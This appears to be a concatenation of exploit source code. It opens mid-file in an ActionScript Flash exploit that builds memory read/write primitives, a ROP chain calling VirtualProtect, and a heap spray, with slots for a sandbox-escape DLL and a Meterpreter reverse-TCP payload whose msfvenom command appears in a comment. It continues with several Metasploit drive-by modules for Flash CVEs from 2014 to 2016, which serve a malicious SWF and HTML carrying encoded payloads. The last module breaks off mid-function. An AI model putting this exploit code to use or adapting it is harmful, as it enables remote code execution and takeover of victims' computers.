gText += "NPSWF32Base Address: 0x" + NPSWF32Base.toString(16) + "\n";
// Look for the corrupted ByteArray::Buffer object address
var tosearch:uint = corrupted_ba_address;
gText += "Ptr to search: 0x" + tosearch.toString(16) + "\n";
var VTableObj:uint = findVTable(tosearch);
gText += "VTable Address: 0x" + VTableObj.toString(16) + "\n";
updateText();
var methodEnvVtable:uint = readDword(VTableObj+0xd4);
gText += "methodEnvVtable Address: 0x" + methodEnvVtable.toString(16) + "\n";
updateText();
// Crash on the Jitted pointer dereference that leads to code execution
//writeDword((VTableObj+0xd4), 0x42424242);
// Control the Jitted pointer dereference that leads to code execution
writeROPChain(NPSWF32Base);
// Decode and Write the files for the privilege escalation to memory
var dll:ByteArray = new ByteArray();
var met:ByteArray = new ByteArray();
var dec1:Base64Decoder = new Base64Decoder();
var dec2:Base64Decoder = new Base64Decoder();
// sandbox exploit code
dec1.decode("YOUR BASE64 PRIVESC SANDBOX ESCAPE DLL CODE HERE");
dll = dec1.toByteArray();
// msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=YOURIP -e generic/none -f exe > pwnd.exe
// base64 pwnd.exe | tr --delete '\n'
// Meterpreter executable or any other payload…
dec2.decode("YOUR BASE64 METERPRETER CODE HERE");
met = dec2.toByteArray();
writeBytes(0x1a100000, met);
writeBytes(0x1a200000, dll);
writeDword((VTableObj+0xd4), 0x1a000000);
gText += allocate[corrupted].toString();
}
private function hexStringToByteArray(hexstring:String) : ByteArray
{
var bindata:ByteArray = new ByteArray();
bindata.endian = "littleEndian";
var hexstr:String = null;
var count:uint = 0;
while(count < hexstring.length)
{
hexstr = hexstring.charAt(count) + (hexstring.charAt(count + 1));
bindata.writeByte(parseInt(hexstr, 16));
count += 2;
}
return bindata;
}
private function writeROPChain(NPSWF32Base:uint):void
{
var ROPaddr:uint = 0x1a00CBE2;
writeDword(0x1a000004, (NPSWF32Base+0x00418a60)); // PIVOT XCHG ECX,ESP...
// Save stack information to restore the execution flow after shellcode
writeDword(0x1a000000, (NPSWF32Base+0x00007324)); // POP EAX # RETN
writeDword(ROPaddr, 0x1a000400); ROPaddr +=4 ; // SAVE ECX VALUE HERE
writeDword(ROPaddr, (NPSWF32Base+0x0000268e)); ROPaddr +=4 ; // MOV [EAX],ECX # RETN
writeDword(ROPaddr, (NPSWF32Base+0x00007324)); ROPaddr +=4 ; // POP EAX # RETN
writeDword(ROPaddr, 0x1a000404); ROPaddr +=4 ; // SAVE EBX VALUE HERE
writeDword(ROPaddr, (NPSWF32Base+0x000064c54)); ROPaddr +=4 ; // MOV [EAX],EBX # POP EBX # POP ECX; RETN
writeDword(ROPaddr, 0x41414141); ROPaddr +=4 ; // JUNK
writeDword(ROPaddr, 0x42424242); ROPaddr +=4 ; // JUNK
// Mona Chain
writeDword(ROPaddr, (NPSWF32Base+0x0039cbea)); ROPaddr +=4 ; // POP EBP # RETN
writeDword(ROPaddr, (NPSWF32Base+0x0039cbea)); ROPaddr +=4 ; // POP EBP # RETN
writeDword(ROPaddr, (NPSWF32Base+0x0077c1eb)); ROPaddr +=4 ; // POP EBX # RETN
writeDword(ROPaddr, 0x00000201); ROPaddr +=4 ;
writeDword(ROPaddr, (NPSWF32Base+0x007fff57)); ROPaddr +=4 ; // POP EDX # RETN
writeDword(ROPaddr, 0x00000040); ROPaddr +=4 ;
writeDword(ROPaddr, (NPSWF32Base+0x00b433a9)); ROPaddr +=4 ; // POP ECX # RETN
writeDword(ROPaddr, (NPSWF32Base+0x00f7e6f5)); ROPaddr +=4 ; // &Writable location
writeDword(ROPaddr, (NPSWF32Base+0x00b1ad8f)); ROPaddr +=4 ; // POP EDI # RETN
writeDword(ROPaddr, (NPSWF32Base+0x00273302)); ROPaddr +=4 ; // ROP NOP # RETN
writeDword(ROPaddr, (NPSWF32Base+0x006cb604)); ROPaddr +=4 ; // POP ESI # RETN
writeDword(ROPaddr, (NPSWF32Base+0x0000d98f)); ROPaddr +=4 ; // JMP [EAX]
writeDword(ROPaddr, (NPSWF32Base+0x002742d3)); ROPaddr +=4 ; // POP EAX # RETN
writeDword(ROPaddr, (NPSWF32Base+0x00b7d364)); ROPaddr +=4 ; // ptr to VirtualProtect IAT
writeDword(ROPaddr, (NPSWF32Base+0x00a4a349)); ROPaddr +=4 ; // PUSHAD # RETN
writeDword(ROPaddr, (NPSWF32Base+0x0015fce4)); ROPaddr +=4 ; // PTR TO JMP ESP
// NOPsled
writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // nopsled
writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // nopsled
writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // shellcode
var Shellcode:String = new String();
Shellcode += "..... YOUR SANDBOX EVASION SHELLCODE HERE ... ";
writeBytes(ROPaddr, hexStringToByteArray(Shellcode)); ROPaddr += Shellcode.length/2;
// Restore component
// 1a00cc56 8b0d0004001a mov ecx,dword ptr ds:[1A000400h]
// 1a00cc5c 8b1d0404001a mov ebx,dword ptr ds:[1A000404h]
// 1a00cc62 28d9 sub cl,bl
// 1a00cc64 87cc xchg ecx,esp
// 1a00cc66 8bec mov ebp,esp
// 1a00cc68 83c52c add ebp,2Ch
// 1a00cc6b 31c0 xor eax,eax
// 1a00cc6d c3 ret
var Restore:String = new String();
Restore = "8b0d0004001a8b1d0404001a28d987cc8bec83c52c31c0c3";
writeBytes(ROPaddr, hexStringToByteArray(Restore)); ROPaddr += Restore.length/2;
}
private function findVTable(startAddress:uint):uint
{
// Find the VTable Object Address within the ByteArrayObject
allocate[corrupted].endian = "littleEndian";
var addr:uint = 0;
var base:uint = 0x16000000;
var bstart:uint = base;
var count:uint = 0;
while (true)
{
if (readDword(base) == startAddress)
{
addr = bstart+count;
// ByteArray::Buffer pointer is at offset +0x40
addr = addr - 0x40;
// VTable Object pointer is at +0x8
return readDword(addr+0x8);
}
else
{
base += 4;
count += 4;
}
}
return addr;
}
private function findNPSWF32_Base(NPSWF32Ptr:uint):uint
{
// Find a DLL base address by appling the scan down technique
var addr:uint = NPSWF32Ptr & 0xfffff000;
while (true)
{
if (readDword(addr) == 0x00905a4d)
{
return addr;
}
else
{
addr = addr - 0x1000;
}
}
return addr;
}
private function readDword(pAddress:uint):uint
{
// Read a DWORD from an address
// by changing the ptr to array of bytes
var tmpIndex:uint = 0;
var res:uint = 0;
// Change ptr to array of bytes
tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000;
allocate[corrupted].position = tmpIndex;
allocate[corrupted].writeUnsignedInt(pAddress);
allocate[corrupted].position = 0;
// Read a DWORD from the new address
res = allocate[corrupted].readUnsignedInt();
// Reset ptr to array of bytes to 0x16000000
tmpIndex = (corrupted_ba_address + 0x8) - pAddress;
allocate[corrupted].position = tmpIndex;
allocate[corrupted].writeUnsignedInt(0x16000000);
return res;
}
private function writeDword(pAddress:uint, value:uint):void
{
// write a DWORD to an address
// by changing the ptr to array of bytes
var tmpIndex:uint = 0;
// Change ptr to array of bytes
tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000;
allocate[corrupted].position = tmpIndex;
allocate[corrupted].writeUnsignedInt(pAddress);
allocate[corrupted].position = 0;
// Read a DWORD from the new address
allocate[corrupted].writeUnsignedInt(value);
// Reset ptr to array of bytes to 0x16000000
tmpIndex = (corrupted_ba_address + 0x8) - pAddress;
allocate[corrupted].position = tmpIndex;
allocate[corrupted].writeUnsignedInt(0x16000000);
}
private function writeBytes(pAddress:uint, data:ByteArray):void
{
// write a ByteArray to an address
// by changing the ptr to array of bytes
var tmpIndex:uint = 0;
// Change ptr to array of bytes
tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000;
allocate[corrupted].position = tmpIndex;
allocate[corrupted].writeUnsignedInt(pAddress);
allocate[corrupted].position = 0;
// Read a ByteArray tp the new address
allocate[corrupted].writeBytes(data, 0, 0);
// Reset ptr to array of bytes to 0x16000000
tmpIndex = (corrupted_ba_address + 0x8) - pAddress;
allocate[corrupted].position = tmpIndex;
allocate[corrupted].writeUnsignedInt(0x16000000);
}
private function findCorruptedAddress():void
{
allocate[corrupted].position = 0;
allocate[corrupted].endian = "littleEndian";
while (true)
{
if(allocate[corrupted].readUnsignedInt() == 0x6230306e)
{
if(allocate[corrupted].readUnsignedInt() == 0x6230306e)
{
// Corrupted Object starts just after the second 0x6230306e tag in case the offset is 0x10
// otherwise after the two 0x41414141 dwords in case the offset is 0x8
// OFFSET 0x10 LENGTH = 0x16000000
if (allocate[corrupted].length == 0x16000000)
corrupted_ba_pos = allocate[corrupted].position;
// OFFSET 0x8 LENGTH = 0xffffffff
else
corrupted_ba_pos = allocate[corrupted].position + 0x8;
// We calculate the address of the corrupted object by using the index
// and the base address that we set through the heap overflow.
corrupted_ba_address = 0x16000000 + corrupted_ba_pos;
// Since every in-use ByteArray object is alternated with a free one
// (we created the holes), the next in-use ByteArray is at 0x18*2 bytes
// from the corrupted one.
next_ba_address = corrupted_ba_address + 0x18*2;
return;
}
}
}
return;
}
private function findCorrupted():uint
{
// Find the corrupted ByteArray::Buffer object.
// We can find it by checking for a size different from the
// original 0x10 bytes, since the ByteArray data is 16 bytes
// for all the objects we allocated, except the corrupted one.
var i:uint = MAX_ARRAY/2;
while (i<MAX_ARRAY)
{
if (i % 2 == 0)
{
if(allocate[i].length != 0x10)
{
return i;
}
}
i++;
}
return 0;
}
public function updateText(e:Event = null):void
{
text.text = gText;
}
public function drawText(e:Event = null):void
{
removeEventListener(Event.ADDED_TO_STAGE, drawText);
text.text = gText;
text.width = 300;
text.height = 100;
text.x = 10;
text.y = 10;
text.multiline = true;
text.wordWrap = true;
text.background = true;
text.border = true;
var format:TextFormat = new TextFormat();
format.font = "Verdana";
format.color = 0xff0000;
format.size = 8;
text.defaultTextFormat = format;
addChild(text);
text.addEventListener(MouseEvent.MOUSE_DOWN, mouseDownScroll);
}
public function mouseDownScroll(event:MouseEvent):void
{
text.scrollV++;
}
}
}
import flash.display.MovieClip;
import flash.utils.*;
class spray extends MovieClip
{
public var allocate:Array;
public function spray()
{
HeapSpray();
}
public function HeapSpray() : void
{
var chunk_size:uint = 1048576; // 0x100000
var block_size:uint = 65536; // 0x10000
var heapblocklen:uint = 0;
var spraychunks:uint = 0;
var heapblock1:ByteArray;
var heapblock2:ByteArray;
var heapblock3:ByteArray;
heapblock1 = new ByteArray();
heapblock1.endian = Endian.LITTLE_ENDIAN;
heapblock1.writeInt(0x41424344);
heapblocklen = heapblocklen + 4;
while(heapblocklen < block_size)
{
heapblock1.writeByte(0x0d); // padding to 64K
heapblocklen = heapblocklen + 1;
}
heapblock2 = new ByteArray();
while(heapblock2.length < chunk_size)
{
heapblock2.writeBytes(heapblock1, 0, heapblock1.length);
}
allocate = new Array();
// 600MB spray
while(spraychunks < 50)
{
heapblock3 = new ByteArray();
heapblock3.writeBytes(heapblock2, 0, heapblock2.length);
allocate.push(heapblock3);
spraychunks = spraychunks + 1;
}
}
}
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
'Description' => %q{
This module exploits a memory corruption happening when applying a Shader as a drawing fill
as exploited in the wild on June 2015. This module has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3105'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-11.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html'],
['URL', 'http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.188')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.460')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3105', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free',
'Description' => %q{
This module exploits a use-after-free vulnerability in Adobe Flash Player. The
vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
is freed from an ActionScript worker, when forcing a reallocation by copying more
contents than the original capacity, but Flash forgets to update the domainMemory
pointer, leading to a use-after-free situation when the main worker references the
domainMemory again. This module has been tested successfully on Windows 7 SP1
(32-bit), IE 8 and IE11 with Flash 17.0.0.134.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bilou', # Vulnerability discovery according to Flash Advisory
'Unknown', # Exploit in the wild
'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-0359'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],
['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],
['URL', 'https://git.hacklab.kr/snippets/13'],
['URL', 'http://pastebin.com/Wj3NViUu']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2014',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',
'Description' => %q(
This module exploits a type confusion on Adobe Flash Player, which was
originally found being successfully exploited in the wild. This module
has been tested successfully on:
macOS Sierra 10.12.3,
Safari and Adobe Flash Player 21.0.0.182,
Firefox and Adobe Flash Player 21.0.0.182.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Genwei Jiang', # FireEye original blog details on the vulnerability
'bcook-r7' # Imported Metasploit module
],
'References' =>
[
['CVE', '2016-4117'],
['BID', '90505'],
['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],
['URL', 'http://www.securitytracker.com/id/1035826'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['osx'],
'BrowserRequirements' =>
{
source: /script|headers/i,
os_name: lambda do |os|
os =~ OperatingSystems::Match::MAC_OSX
end,
ua_name: lambda do |ua|
case target.name
when 'Mac OS X'
return true if ua == Msf::HttpClients::SAFARI
return true if ua == Msf::HttpClients::FF
end
false
end,
flash: lambda do |ver|
case target.name
when 'Mac OS X'
return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')
end
false
end
},
'Targets' =>
[
[
'Mac OS X', {
'Platform' => 'osx',
'Arch' => ARCH_X64
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 27 2016',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri.end_with? 'swf'
print_status('Sending SWF...')
send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(3..7)}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
if target.name.include? 'osx'
platform_id = 'osx'
end
html_template = %(<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
</object>
</body>
</html>
)
return html_template, binding
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')
File.binread(path)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player copyPixelsToByteArray Integer Overflow',
'Description' => %q{
This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs
in the copyPixelsToByteArray method from the BitmapData object. The position field of the
destination ByteArray can be used to cause an integer overflow and write contents out of
the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit),
IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery and 64 bit analysis / exploit
'Nicolas Joly', # Trigger for 32 bit, according to the project zero ticket
'hdarwin', # @hdarwin89, 32 bit public exploit, this msf module uses it
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2014-0556'],
['URL', 'http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html'],
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=46'],
['URL', 'http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/'],
['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-21.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 23 2014',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0556', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player casi32 Integer Overflow',
'Description' => %q{
This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in
the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as
domainMemory for the current application domain. This module has been tested successfully
on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bilou', # Vulnerability discovery
'juan vazquez' # msf module
],
'References' =>
[
['ZDI', '14-365'],
['CVE', '2014-0569'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'],
['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^15\./ && ver == '15.0.0.167' },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 14 2014',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ByteArray With Workers Use After Free',
'Description' => %q{
This module exploits an use after free vulnerability in Adobe Flash Player. The
vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
is freed from an ActionScript worker, who can fill the memory and notify the main
thread to corrupt the new contents. This module has been tested successfully on
Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.296.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and exploit in the wild
'hdarwin', # Public exploit by @hdarwin89 (all the magic)
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-0313'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-02.html'],
['URL', 'http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^16\./ && ver == '16.0.0.296' },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Feb 02 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
